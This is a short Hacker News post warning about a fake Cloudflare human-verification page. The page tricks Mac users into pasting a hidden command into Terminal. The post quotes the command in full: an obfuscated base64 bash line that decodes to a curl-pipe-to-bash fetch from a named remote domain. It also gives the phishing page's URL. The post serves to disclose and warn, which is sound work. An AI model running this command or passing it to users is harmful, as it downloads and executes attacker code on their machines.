Tell HN: Exploit mimicking Cloudflare's verify human page

Y	Hacker News new \| ask \| show \| jobs

3 points by SenHeng 10 days ago

I just had a site pop up showing cloudflare's verify you're a human page. after checking the check box, a modal pops up telling you to

1. press command space

2. type in Terminal and enter

3. type in cmd V and enter

Wait a minute, I don't remember copying anything.... I pasted into a slack chat and this popped up.

`bash <<< $(echo "Y3VybCAtcyAnaHR0cHM6Ly9ydW50aW1lLWZvdW5kcnkuZGlnaXRhbC9zY3JpcHQuc2gnIHwgYmFzaA==" | base64 -d)`

descrypting the string turns it in to `curl -s 'https://runtime-foundry.digital/script.sh' | bash`

This is the offending website.

https://secure-access-31f.pages.dev/?vc=7b853dfa42a14cb5b124029e98c46454&ts=1780325659009&rn=755411

I don't remember how I came upon it. I was doing a search on google and simply cmd clicked every single result. It was probably one of those.